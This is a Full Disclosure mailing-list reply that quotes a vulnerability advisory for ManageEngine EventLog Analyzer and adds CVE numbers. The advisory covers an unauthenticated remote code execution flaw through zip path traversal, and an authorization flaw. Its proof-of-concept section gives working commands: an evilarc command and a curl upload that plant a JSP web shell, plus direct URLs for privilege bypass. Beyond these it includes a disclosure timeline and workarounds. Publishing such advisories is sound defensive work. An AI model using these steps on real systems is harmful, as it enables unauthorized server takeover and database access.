On 3 September 2014 07:23, Pedro Ribeiro <[email protected]> wrote: > On 31 August 2014 16:39, Advisories <[email protected]> wrote: >> Mogwai Security Advisory MSA-2014-01 >> ---------------------------------------------------------------------- >> Title: ManageEngine EventLog Analyzer Multiple Vulnerabilities >> Product: ManageEngine EventLog Analyzer >> Affected versions: EventLog Analyzer 9.9 (Build 9002) on Windows/Linux >> Impact: critical >> Remote: yes >> Product link: http://www.manageengine.com/products/eventlog/ >> Reported: 18/04/2013 >> by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung >> Muench) >> >> >> Vendor's Description of the Software: >> ---------------------------------------------------------------------- >> EventLog Analyzer provides the most cost-effective Security Information and >> Event Management (SIEM) software on the market. Using this Log Analyzer >> software, organizations can automate the entire process of managing terabytes >> of machine generated logs by collecting, analyzing, searching, reporting, >> and archiving from one central location. This event log analyzer software >> helps to mitigate internal threats, conduct log forensics analysis, monitor >> privileged users and comply to different compliance regulatory bodies >> by intelligently analyzing your logs and instantly generating a variety of >> reports like user activity reports, regulatory compliance reports, >> historical trend reports, and more. >> >> >> Business recommendation: >> ---------------------------------------------------------------------- >> During a penetration test, multiple vulnerabilities have been identified >> that are based on severe design/implementation flaws in the application. >> It is highly recommended not to use this software until a thorough >> security review has been performed by security professionals and all >> identified issues have been resolved. >> >> >> Vulnerability description: >> ---------------------------------------------------------------------- >> 1) Unauthenticated remote code execution >> ME EventLog Analyzer contains a "agentUpload" servlet which is used by Agents >> to send log data as zip files to the central server. Files can be uploaded >> without >> authentication and are stored/decompressed in the "data" subdirectory. >> >> As the decompress procedure is handling the file names in the ZIP file in a >> insecure way it is possible to store files in the web root of server. This >> can >> be used to upload/execute code with the rights of the application server. >> >> 2) Authorization issues >> The EventLog Analyzer web interface does not check if an authenticated has >> sufficient permissions to access certain parts of the application. A low >> privileged >> user (for example guest) can therefore access critical sections of the web >> interface, >> by directly calling the corresponding URLs. This can be used to access the >> database >> browser of the application which gives the attacker full access to the >> database. >> >> >> Proof of concept: >> ---------------------------------------------------------------------- >> 1) Unauthenticated remote code execution >> >> >> - Create a malicious zip archive with the help of evilarc[1] >> evilarc.py -d 2 -o unix -p webapps/event cmdshell.jsp >> - Send the malicious archive to the agentUpload servlet >> curl -F "[email protected]" http://172.16.37.131:8400/agentUpload >> - Enjoy your shell >> http://172.16.37.131:8400/cmdshell.jsp >> >> A working Metasploit module will be released next week. >> >> >> 2) Authorization issues >> - Log in as a low privileged user (for example guest/guest) >> - Directly call the URL of the database browser >> http://xxx.xxx.xxx.xxx:8400/event/runQuery.do >> >> >> Vulnerable / tested versions: >> ---------------------------------------------------------------------- >> EventLog Analyzer 8.2 (Build 8020) (Windows) >> EventLog Analyzer 8.2 (Build 8020) (Linux) >> EventLog Analyzer 9.0 (Build 9002) (Windows) >> EventLog Analyzer 9.0 (Build 9002) (Linux) >> >> Other versions might also be vulnerable. >> >> >> Disclosure timeline: >> ---------------------------------------------------------------------- >> 14/04/2013: Vulnerability discovery >> 18/04/2013: Informed vendor via ManageEngine Security Response Center (MESRC) >> Form >> 23/04/2013: Second try to contact MESRC, as we didn't receive any response >> from >> the first try. >> 23/04/2013: Response from vendor, they wait on some feedback from the >> development team >> 10/05/2013: Response from vendor, saying that this is rather a issue than a >> vulnerability, will fix it anyway >> 13/05/2013: Technical details including a working proof of concept send >> ManageEngine. >> 13/05/2013: Vendor response, say that they forward it to the development team >> 24/05/2013: Vendor response, saying that they will fix it in 2013 as they are >> "tightly scheduled on other priorities" >> 24/05/2013: Response from us, asking if we will be informed when the >> vulnerability is fixed >> 28/05/2013: Response from ManageEngine, saying that we must subscribe to >> their >> newsletter for release information >> 05/09/2013: Verification that exploit is still working with the current >> version >> 30/08/2014: Verification that exploit is still working with the current >> version >> 31/08/2014: Public release >> >> Solution: >> ---------------------------------------------------------------------- >> No known solution >> >> Workaround: >> ---------------------------------------------------------------------- >> 1) Unauthenticated remote code execution >> If agents are not used to collect log information, access to the servlet >> can be disabled by commenting out the following lines in the web.xml file >> (webapps/event/WEB-INF/web.xml) and restart the service. >> >> >> agentUpload >> com.adventnet.sa.agent.UploadHandlerServlet >> >> >> agentUpload >> /agentUpload >> >> >> >> 2) Authorization issues >> No workaround, reduce the attack surface by disabling unused low privileged >> accounts like "guest". >> >> >> Advisory URL: >> ---------------------------------------------------------------------- >> https://www.mogwaisecurity.de/en/lab/advisories/ >> >> >> References >> ---------------------------------------------------------------------- >> [1] evilarc >> https://github.com/ptoomey3/evilarc >> >> ---------------------------------------------------------------------- >> Mogwai, IT-Sicherheitsberatung Muench >> Steinhoevelstrasse 2/2 >> 89075 Ulm (Germany) >> >> [email protected] >> >> _______________________________________________ >> Sent through the Full Disclosure mailing list >> http://nmap.org/mailman/listinfo/fulldisclosure >> Web Archives & RSS: http://seclists.org/fulldisclosure/ > > > MITRE have assigned CVE-2014-6037 for this issue. > > Regards, > Pedro
The CVE above is for issue 1) Unauthenticated remote code execution / file upload via insecure path handling. MITRE has also assigned CVE-2014-6043 for issue 2) Authorization issues. Regards, Pedro _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
